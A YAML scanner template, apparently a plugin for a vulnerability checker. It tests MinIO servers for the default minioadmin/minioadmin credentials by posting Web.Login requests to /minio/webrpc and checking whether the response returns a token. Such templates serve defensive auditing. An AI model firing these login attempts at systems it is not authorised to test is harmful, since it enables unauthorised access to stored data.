product: MinIO
vName: MinIO默认密码
type: 默认口令/弱口令
vID: [ ]
level: 3
vDesc: ''
version: ''
note: ''
search: { }
protocol: http
link: https://docs.min.io/cn/
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: or
exploit:
  - exp:
      method: post
      follow: false
      path: /minio/webrpc
      json: { "id": 1,"jsonrpc": "2.0","params": { "username": "minioadmin","password": "minioadmin" },"method": "Web.Login" }
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - uiVersion
              - token
            logic: and
          header:
            value:
              - Content-Type
              - json
            logic: and
  - exp:
      method: post
      follow: false
      path: /minio/webrpc
      json: { "id": 1,"jsonrpc": "2.0","params": { "username": "minioadmin","password": "minioadmin" },"method": "web.Login" }
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - uiVersion
              - token
            logic: and
          header:
            value:
              - Content-Type
              - json
            logic: and